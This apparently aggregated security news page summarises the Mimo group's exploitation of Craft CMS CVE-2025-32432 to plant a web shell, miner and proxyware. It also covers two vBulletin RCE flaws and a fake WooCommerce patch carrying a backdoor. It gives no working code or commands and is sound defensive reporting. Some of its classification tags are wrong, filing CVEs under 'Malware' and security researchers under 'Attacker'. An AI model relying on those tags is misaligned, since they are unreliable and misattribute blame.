FlagThis - #websecurity

A new cyber threat has emerged, with the threat actor known as Mimo exploiting a recently disclosed remote code execution vulnerability, CVE-2025-32432, in the Craft Content Management System (CMS). The attackers are leveraging this vulnerability to deploy a suite of malicious payloads, including a cryptocurrency miner, a loader dubbed Mimo Loader, and residential proxyware on compromised websites. This allows them to not only abuse system resources for illicit cryptocurrency mining, but also monetize the victim's internet bandwidth for other malicious activities.

The exploitation of CVE-2025-32432 unfolds in two phases. The attacker activates a web shell by injecting PHP code via a specially crafted GET request. This action triggers a redirection, prompting the application to record the return URL within a server-side PHP session file. Once the web shell is enabled, commands can be executed remotely. The web shell is used to download and execute a shell script, which checks for indicators of prior infection and uninstalls any existing cryptocurrency miners before delivering next-stage payloads and launching the Mimo Loader.

The Mimo Loader modifies "/etc/ld.so.preload" to hide the malware process. Its ultimate goal is to deploy the IPRoyal proxyware and the XMRig miner on the compromised host. Sekoia researchers Jeremy Scion and Pierre Le Bourhis noted the unusual naming choice of the Python library "urllib2" being aliased as "fbi," suggesting it may be a tongue-in-cheek nod to the American federal agency, serving as a distinctive coding choice and a potential indicator for detection. The activity has been linked to the Mimo intrusion set, which has been active since at least March 2022 and has previously exploited vulnerabilities in Apache Log4j, Atlassian Confluence, PaperCut, and Apache ActiveMQ.


References :

• blog.sekoia.io: Jeremy Scion, Pierre Le Bourhis & Sekoia TDR present an analysis of the compromise chain initiated by the exploitation of CVE-2025-32432. The exploitation occurred in a CMS honeypot and led to a loader, a crypto miner, and a residential proxyware.
• bsky.app: Sekoia has identified Mimo, a threat actor that exploits a recently patched Craft CMS zero-day to deploy its own loader, cryptominers, and residential proxyware on hacked websites
• The Hacker News: Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware
• securityonline.info: Mimo Returns: CVE-2025-32432 Exploited in Cryptomining and Proxyware Campaigns
• ciso2ciso.com: Mimo Hackers Exploit CVE-2025-32432 in Craft CMS to Deploy Cryptominer and Proxyware – Source:thehackernews.com
• bsky.app: Sekoia has identified Mimo, a threat actor that exploits a recently patched Craft CMS zero-day to deploy its own loader, cryptominers, and residential proxyware on hacked websites The operators appear to be based in the Middle East
• Virus Bulletin: Jeremy Scion, Pierre Le Bourhis & Sekoia TDR present an analysis of the compromise chain initiated by the exploitation of CVE-2025-32432. The exploitation occurred in a CMS honeypot and led to a loader, a crypto miner, and a residential proxyware.

Classification:

• HashTags: #CraftCMS #Cryptominer #Proxyware
• Company: Craft CMS
• Target: Websites
• Attacker: Mimo
• Product: Craft CMS
• Feature: 0-day
• Malware: CVE-2025-32432
• Type: 0Day
• Severity: Critical

Two critical vulnerabilities, CVE-2025-48827 and CVE-2025-48828, have been identified in vBulletin forum software, impacting versions 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3. The vulnerabilities enable API abuse and remote code execution, posing a significant threat to forums running the affected versions. Security experts warn that one of these vulnerabilities is already being actively exploited in the wild, making it crucial for administrators to take immediate action.

The flaws are rated as critical, with CVE-2025-48827 receiving a CVSS v3 score of 10.0 and CVE-2025-48828 receiving a score of 9.0. CVE-2025-48827 is an API method invocation issue, allowing unauthenticated users to invoke protected API controllers' methods when running on PHP 8.1 or later. The second flaw, CVE-2025-48828, enables attackers to run arbitrary PHP code by abusing template conditionals. Both vulnerabilities were discovered by security researcher Egidio Romano on May 23, 2025, and exploit attempts were observed in the wild shortly after disclosure.

vBulletin users are urged to immediately apply patches released last year that remediate both vulnerabilities or to upgrade to the latest version 6.1.1. The vulnerabilities were likely patched quietly last year with the release of Patch Level 1 for all versions of the 6.* release branch. Security researchers recommend that defenders and developers review their frameworks and custom APIs, especially if they are dynamically routing controller methods through Reflection. They also suggest auditing access restrictions and examining application behavior across different PHP versions to prevent similar exploits.


References :

• cyberpress.org: Severe vBulletin Forum Flaw Enables Remote Code Execution
• securityonline.info: Critical Pre-Auth RCE: vBulletin Flaw Allows Full Server Compromise (PoC Available)
• infosec.exchange: A newly discovered vulnerability in vBulletin, one of the world’s most popular forum platforms, has exposed thousands of online communities to the risk of unauthenticated Remote Code Execution
• Cyber Security News: Severe vBulletin Forum Flaw Enables Remote Code Execution
• securityaffairs.com: SecurityAffairs reports Two flaws in vBulletin forum software are under attack.
• BleepingComputer: Hackers are exploiting critical flaw in vBulletin forum software.
• www.scworld.com: Attacks exploiting maximum severity vBulletin vulnerability ongoing

Classification:

• HashTags: #vBulletin #RCE #Exploit
• Company: vBulletin
• Target: vBulletin forum users
• Product: vBulletin
• Feature: Remote Code Execution
• Malware: CVE-2025-48827, CVE-2025-48828
• Type: Vulnerability
• Severity: Critical

Attackers are actively exploiting vulnerabilities in popular content management systems (CMS) like WordPress and Craft CMS to gain unauthorized access to web servers. These attacks highlight the critical need for website administrators to stay vigilant and promptly apply security patches. A significant phishing campaign has been identified targeting WordPress WooCommerce users, where victims are tricked into downloading a fake security patch that actually installs a backdoor on their sites, allowing attackers persistent access.

Craft CMS is also facing active exploitation of a critical vulnerability, CVE-2025-32432, which allows for Remote Code Execution (RCE). This flaw is particularly dangerous as it is being chained with another vulnerability, CVE-2024-58136 in the Yii framework, to facilitate zero-day attacks. These chained exploits enable attackers to breach servers and steal sensitive data. Researchers are urging Craft CMS users to update to patched versions immediately to mitigate the risk.

An investigation into a compromised server revealed that attackers used CVE-2025-32432 to download a PHP-based file manager, which then enabled them to upload further malicious PHP files. The investigation involved analyzing access logs from the web server and Craft CMS logs, including web logs and phperrors.log, to identify the attacker's actions. The attack leverages Craft CMS's asset management system, exploiting a flaw in how the system handles asset IDs and image transformations.


References :

• securityaffairs.com: A large-scale phishing campaign targets WordPress WooCommerce users with a fake security alert urging them to download a ‘critical patch’ hiding a backdoor.

Classification:

• HashTags: #WordPress #CraftCMS #WebSecurity
• Company: WordPress
• Target: Web Servers, WooCommerce Users
• Attacker: Patchstack, Orange Cyberdefense’s CSIRT
• Product: WordPress WooCommerce, Craft CMS
• Feature: Malicious Plugin
• Malware: Backdoor
• Type: Hack
• Severity: Major